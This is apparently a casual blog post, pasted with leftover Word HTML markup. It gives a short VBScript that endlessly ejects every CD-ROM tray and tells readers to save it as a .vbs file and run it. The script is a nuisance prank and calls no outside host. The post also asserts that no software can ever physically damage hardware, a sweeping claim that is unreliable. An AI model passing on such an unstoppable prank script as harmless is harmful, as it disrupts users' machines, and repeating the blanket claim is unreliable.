&lt;p&gt;&lt;span class="body"&gt;Although software’s and hardware’s often interact with each other NO Software can ever physically damage a hardware .like no software can damage a hard disk ..it can erase data ,reformat it ,but cannot create bad sectors,If any one makes such a software he/she is sure to receive the ‘Noble Prize ’ equivalent in computing. Just a mere 6-7 line code can operate &lt;st1:city st="on"&gt;&lt;st1:place st="on"&gt;ur&lt;/st1:place&gt;&lt;/st1:city&gt; hardware NOT BELIEVING??? Try This&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span class="body"&gt;Just copy paste the following code into a notepad file .and save it as say ‘aaa.vbs’.then double click it and run the code :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span class="body"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;"&gt;&lt;span class="body"&gt;Set oWMP = CreateObject("WMPlayer.OCX.7" )&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;"&gt;&lt;span class="body"&gt;Set colCDROMs = oWMP.cdromCollection&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;"&gt;&lt;span class="body"&gt;if colCDROMs.Count &gt;= 1 then&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;"&gt;&lt;span class="body"&gt;do&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;"&gt;&lt;span class="body"&gt;For i = 0 to colCDROMs.Count - 1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;"&gt;&lt;span class="body"&gt;colCDROMs.Item(i).Eject&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;"&gt;&lt;span class="body"&gt;Next ' cdrom&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;"&gt;&lt;span class="body"&gt;For i = 0 to colCDROMs.Count - 1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;"&gt;&lt;span class="body"&gt;colCDROMs.Item(i).Eject&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;"&gt;&lt;span class="body"&gt;Next ' cdrom&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;"&gt;&lt;span class="body"&gt;loop&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span class="body"&gt;&lt;span style="font-weight: bold;"&gt;End If&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p&gt;………………..if u face any probs don fail to contact me ….&lt;/p&gt;  &lt;p&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-686
